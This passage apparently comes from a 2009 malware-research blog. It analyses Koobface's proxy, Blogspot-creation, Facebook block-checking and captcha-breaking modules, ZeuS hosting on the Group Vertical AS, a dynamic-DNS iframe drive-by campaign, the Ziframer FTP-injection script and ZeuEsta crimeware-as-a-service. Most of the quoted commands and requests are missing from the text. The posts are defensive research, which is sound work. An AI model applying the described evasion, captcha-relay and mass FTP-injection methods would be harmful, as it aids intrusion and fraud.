…and will try to open port 80 (HTTP) and port 53 (DNS) on the Windows Firewall by using the following commands:

Afterwards the module will try to look up aol.com and www.imageshack.com. If the request is successful, he will ping the IP address of aol.com (207.200.74.38) and www.imageshack.com (64.202.189.170). The module will detect the response time of the PING packed sended to aol and imageshack and will report it to the Koobface Command&Control server:

Additionally the module also reports the Clients uptime and how many hits the webserver had. If you now check the client port 80 you will see the following code:

Page moved <a href="#" onclick="javascript:location.reload();return false;">here</a>.
<script>setTimeout('location.reload()', 1000)</script>

Et Voilà – the computer can now be used as zombie/proxy in Koobface’s Command&Control server infrastructure and as server in the fourth stage in Koobface’s infection process.

v2newblogger.exe – A module to create new Blogspot URLs (Google)
The module v2newblogger.exe will try to create new Blogspot’s URLs. Let’s see how this works.

Initially the module tries to connect to news.google.com (requesting the “Top Stories” RSS feed):

It uses title and content of the Top story later to create a post on Google blogspot. In the next step the module will call the Command&Control server capthcabreak.com (67.212.69.230 – Netelligent Hosting Services Inc. Canada) and will request a username which the module will use for blogspot.com

The C&C server will response with a random firstname, lastname and a username:

In the next step the module calls mail.google.com/mail/signup to create a new Google Account. The web form is protected by a captcha – but that is no problem for Koobface: He will grab the captcha (image) and send it to the C&C server:

The C&C server will return a task ID for this captcha:

A few seconds later the module will call the C&C server again and asks the status of the Task ID:

and the C&C server will response with the status of the task (and if available the result of the captcha):

The C&C server will return a status code (3) followed by the captcha (dreamyter). Now it’s possbile for the module to create the account without any problems.

v2googlecheck.exe – A module to check Facebook for blocked URLs
OK this module is REALLY interesting – it is used to check if a Blogspot or bit.ly URL is blocked at Facebook. Some background information: If you see a URL on Facebook and you think its malicious you can report it to Facebook. Facebook will then check if the URL is malicious. If so, Facebook will block the URL:

(click to enlarge)

To react against this “problem”, the Koobface gang drops the binary “v2googlecheck.exe”.
First of all the module will report its version to the Koobface C&C (capthcabreak.com):

The C&C server will answer the with a Blogspot or bit.ly URL :

The C&C server answers with a Blogspot or bit.ly URL and a Task ID (191720)
Now the module will check if the URL is blocked on Facebook by calling a script called l.php located on facebook.com:

If the blogspot URL is blocked by Facebook, Facebook will return a error page (as seen before). Otherwise the request will be redirected to the blogpost URL. Anyway, the module will save the response body from Facebook and will send it back to the C&C server:

A few seconds later the module will check the status of his previous submission by calling the C&C server using the Trask ID he recived from the C&C server before (191720):

The C&C will answer with 0 which will close/finish the task.

v2captcha.exe – The captcha breaking module
This module will frequently call the C&C server for new captchas to break. The request which the module sends to the C&C server looks like this:

The C&C server will check if he has a captcha to break. If not, the C&C server just return 0, otherwise the C&C server will return a Task ID and a captcha which the bot have to break:

The module will request the captcha-image from the server (captcha.com) and will freez the computer screen with the message “Type the characters you see in the picture below”. To unlock the screen, the user must enter the captcha served by Koobface:

Click to enlarge

*** Conclusion ***
In most case the binaries dropped by Koobface have a very good AV detection rate. However the Koobface trojan has some sophisticated tricks to spear it self. It is the first “big” trojan which uses social networks to spread itself. So it comes to the question if social networks are threats for corporate networks and if they should ban social networks out of the office.

Another problem is the module which is checking if a blogspot / bit.ly URL is already blocked on facebook. The Koobface gang knows how many faked URLs are currently active and how many are banned from Facebook. So its nearly usless to ban the fake URLs from Facebook and try to suspend/delete the involved blogspot / bit.ly URLs: Koobface just need a few minutes to react and create new fake blogpost / bit.ly URLs which Koobface can use in its infection process.

Another point is the fact, that every one is talking about “web 2.0″ – and most people are unawar of web 2.0 threats. As I said before, Koobface is the first big social network trojan – but I’m really sure it won’t be the last one. Trojans which are using web 2.0 to spread themselves don’t need to care about spam filters and email addresses. They can bypass the corporates (strong) email filter by using web 2.0.

Finally the security industry have to ask itself if captchas are still secure or not. The fact that there already commercial “Captcha Decoder Servis” worries me.

*** Domains to block ***
The following domains should be blocked on corporate gateways/firewalls:

• Sunbelt Blog: URL-shortening service Bit.ly will check links for malcode
• Security Fix: Bit.ly to scour shortened links for badness
• Wikipedia: Koobface

Bookmark, tagg it or email it to a friend:

More »

Today I took a look at the ZeuS statistics on the ZeuS Tracker and I was really suprised:

As you can see on the statistic above the number of active ZeuS Command&Control servers (C&C) had a big decreas on the 26th october 2009. My first thought was that there maybe was a problem with the ZeuS Tracker script. But after I tooked a look at the top ZeuS hosting ISPs on the ZeuS Tracker, I saw that all ZeuS Command&Control servers in the subnet of Group Vertical (AS49365) are offline. Finally I took a look at the CIDR Report for AS49365 and I was happy to see that this rogue AS is no longer being announced in the global BGP table:

Source: CIDR report for AS49365

So I guess that the Russian upstream provider Fiord has cut off their peers to the rogue ISP Group Vertical on 26th october 2009. As e result of this, Group Vertical lost their internet connection and the number of active ZeuS Command&Control servers (C&C) dropped rapidly from 190 down to 148 world wide – That’s more than 40 ZeuS Command&Control server which are now no longer reachable from the internet!

McColo… Ural Industrial Company… Real Host… Group Vertical… Who’s next?

Bookmark, tagg it or email it to a friend:

More »

Source: www.robtex.com/as/as49365.html

If you Google AS49365, you will only find a very small numbers of reports concerning abuse comming from this AS. So normaly I would think, that there is nothing to worry about… but fact is: AS49365 is currently Top ZeuS hosting ISP:

Source: zeustracker.abuse.ch/monitor.php?as=49365

There are currently 32 malicious ZeuS Command&Control server (C&C) in this AS tracked by ZeuS Tracker – 25 of them are currently active.

Let’s try to get some more information about this ISP:

Group Vertical Ltd has its upstream on JSC “TRC FIORD” (Fiord-AS), a Russian ISP located in Moscow, which is offering Internet connections, web-hosting and colocation services:

Source: www.robtex.com/as/as49365.html

The subnet (91.212.220.0/24) was allocated by Group Vertical on 2009-05-26.
But this AS wasn’t always rogue: Most of those ZeuS command&control servers started to show up in this AS between August 2009 and October 2009.

And now the million dollar question: Why has this AS just started to hosting so much garbage in August 2009?

The answer seems to be the fact that the Latvian ISP JUNIK-RIGA-LV has just cut-off its downstream connection to the well known rogue ISP Real Host on August 3rd, which have hosted more then 20 ZeuS command&control servers. So the bad guys had to look for a new home for their crap – and have found Group Vertical.

Bookmark, tagg it or email it to a friend:

More »

The drive-by campaign consists of three different stages illustrated below:

*** First stage***
The first stage is always the same on all drive-by campaigns: The cybercriminals injects malicious code into legitimate websites (mostly using stolen FTP credentials, see “An Iframer for Dummies”). In this case the malicious code is a iframe which is pointing to a malicious domain for the second stage. The Iframe can look like this:

As you can see above, for this purpose the cybercriminals are using dynamic DNS domains names in the Iframes.

*** Second stage***
The second stage is the URL to which an iframe from the first stage is pointing to. The URL comes along with one of the following parameter, which will be given to in.cgi:

For example:

If a user visits a infected website with such a malicious iframe, the in.cgi script tries to set three cookies for the domain traffcount.cn (222.73.37.203 – CHINANET-SH) and sends a HTTP 302 (redirect) back to the victims browser.

Here’s an example of such a request:

…with the following HTML content:

…and the following cookies (one per line):

Until now I’ve seen the following dynamic DNS domains which are acting as “redirector” in the second stage:

Redirecting URLs (second stage)

Each of these redirection domains seems to select a target URL as redirection for the third stage. For this purpose every redirection URL has a pool of ten target URLs to choose from (some kind of a domain set), and this pool is changed every hour.

*** Third stage ***
As mentioned before, the dynamic DNS domains used by the third stage will change frequently (using different domain sets and HTTP 302). One would expect the target domains to contain malicious code that exploits vulnearable web browsers and browser plugins used by the visitors. BUT actually they are neither serving contents nor exploits – just blank pages:

Target URLs (third stage)

A full list of the malicious domains used by this drive by campaign in the third stage can be found here: www.abuse.ch/downloads/dyndns_driveby.txt (currently I already caputred more than 1′500 uniq domains which are assoiciated with this drive-by campaign). The list will be updated permanently using a script.

Conclusion
The strange thing is that the malicious domains currently doesn’t serve any kind of exploits/malware. So the question is why the cybercriminals are injecting malicious Iframes in thousands of legitimate websites while the drive-by infection doesn’t work? While several explanations like geoIP dependencies exist, the following one sounds most reasonable: They want to inject the malicious iframes in as many sites as possible. As soon as they have infected enough websites, they will put exploits on to the dynamic DNS domains which are currently just hosting a blank page. The benefit of it could be that AV-vendors are not able to get any exploits or malware before the cybercriminals “activate” the attack. Though the security industry might track the threat, they would be unable to react onto it while the attack has not been launched (don’t forget the domain flux which the domains are using).

Dynamic DNS domains are more and more used for this kind of attacks. Maybe it’s time for us to reconsider firewall policies of corporate networks concerning access to them?

UPDATE 2009-09-14
It seems that this drive-by campaign spreads a variant of the Bredolab trojan.

Bookmark, tagg it or email it to a friend:

More »

An Iframer is a script which is used to test stolen FTP accounts and inject malicious code into web pages. If an FTP account is valid, the Iframer automaticly puts an Drive-by infection on the specified html, php or asp files.

In this case the Iframer is a PHP-script which is used to spread a variant of ZeuS (aka Zbot/WSNPoem). The Iframer is called “Ziframer” and is sold for 30$. The PHP script can bee launched via command line or accessed using a web browser:

The script is very simple and just needs a list of FTP accounts which the script should check. As you can see on the screenshot above, the input file (ftp.txt) currently contains more then 18′000 stolen FTP credentials:

In the file “iframe.txt” the attacker can define the (JavaScript- or HTML-) code he would like to inject:

The cyberciminal has also the possibility to set a timeout, a file where the script will report invalid FTP credentials (bad.txt) and a file which will collect valid FTP credentials (good.txt). The screenshot below shows you the script while working through the list of stolen FTP credentials (ftp.txt):

Last but not least the attacker has to define where he wants to put the malicious code. He has the following options:

Now the cybercriminal has just to press the “START” button to run the script. The Iframer script will now get through the FTP accounts and inject the malicious code which is defined in the file “iframe.txt” (see this one).

To make the use of the script more user friendly, the script has a readme file which describes the usage of the script in russian and english.

Content of readme.html (english):

Conclusion

The Ziframe script is very simple an cheap. Even a n00b is able to use it.

It also demonstrates how efficiently and easily cybercriminals can distribute their malicious code to tremendous numbers of stolen FTP accounts. Automated mechanisms like this one shows how infection vectors are more and more shifted from E-mails with malicious attachments to Drive-by. The modular approach allows the cybercriminal to feed the script with different lists of compromised accounts that can be acquired on the underground market.

Bookmark, tagg it or email it to a friend:

More »

But first of all: What is ZeuEsta?
ZeuEsta comes from the two words ZeuS and El Fiesta. ZeuEsta is a mix of the ZeuS crimeware and the El Fiesta Exploit Kit. However, since April 17 2009 ZeuEsta is no longer sold with the El Fiesta Exploit Kit, but now in combination with SPack Exploit Kit:

The page which I came awar is selling ZeuEsta as a service. The page seems to be very informative. You can see how many User Slots are available, how many of them are already assigned and which version of ZeuEsta is beeing used:

Additionally you can see on the page that the ZeuEsta hosting service is already running since November 2008.

The web page which is promoting / selling this services is called zeus-services.info and is hosted at AltaVista (Yahoo):

Here is the whois output of zeus-services.info:

There is a Question&Answers section on the page which describes how ZeuEsta works:

There are also some features of ZeuEsta listed on the page like the fact that ZeuEsta is exploiting IE, Firefox, Opera and Adobe Reader 6/7/8, logging outgoing browser connections (HTTP/HTTPS/FTP), stealing browser cookies and accessing all sites defined in the config file (e.g. used for stealing banking information and Credit Cards).

Much more interessting as the features of ZeuEsta is the price model of the service and what a cybercriminal gets for his money when he buys ZeuEsta Hosting:

As you can see above, the vendor of the service is offering the cybercriminals a weekly update of undetected binaries to spread the ZeuS bot. But what happens when the ZeuEsta hosting sevice runs out and the cybercriminal fails to pay for the service for another month? Well, the vendor of the ZeuEsta will just sell the ZeuS botnet to another customer:

If the cybercriminal is still not feeling confident, the vendor offers him a free demo of the ZeuEsta hosting service.

There is also a tutorial on the page which is describing different ways to spread the ZeuS bot:

Another File is describing the ZeuS Commands:

While I was doing some research in this case I came accross a forum topic where some people talked about ZeuEsta. There are some interessting posts concering this topic like that the original price for ZeuEsta is about $150 (zeus-services.info is selling it for 600$). Another one says:

[...] I got a botnet with 800 zombies (mostly USA)

In a another forum the vendor of ZeuEsta hosting says:

And later:

Now he is selling the service using the two domains zeus-services.info / zeus-service.blogspot.com.

Last but not least there are some contact informations on the page:

Conclusion

It’s interessting to see that two crimeware kits are beeing combined (ZeuS and SPack). It seems that there is a price competition in the criminal underground and that the price for the same crimeware kit can vary from just a few dollars up to hundreds of dollars and more.

But the six slots for customers which the ZeuEsta hosting service offers is just a drop in a bucket: There are currently more than 200 well known hosts around the globe which are spreading the ZeuS trojan and/or acting as Command&Control Server (C&C) for ZeuS infected bots (see abuse.ch ZeuS Tracker). According to Damballa, ZeuS has with 3.6 million infected computers the most infected computers in United States (Source: Network World: America’s 10 most wanted botnets).

During my reasearch I came across some post where vendors of such crimeware services / crimeware kits are complaining about DDoS attacks againts their site(s) where they are selling their services / crimeware kits. Obviouslye criminals are not only attacking legitim websites (like abuse.ch) using DDoS attacks, but are also fighting against each other.

Cybercrime is a dirty business – Keep your hands off

Further reading

• Dancho Danchev: Zeus Crimeware as a Service Going Mainstream

Bookmark, tagg it or email it to a friend:

More »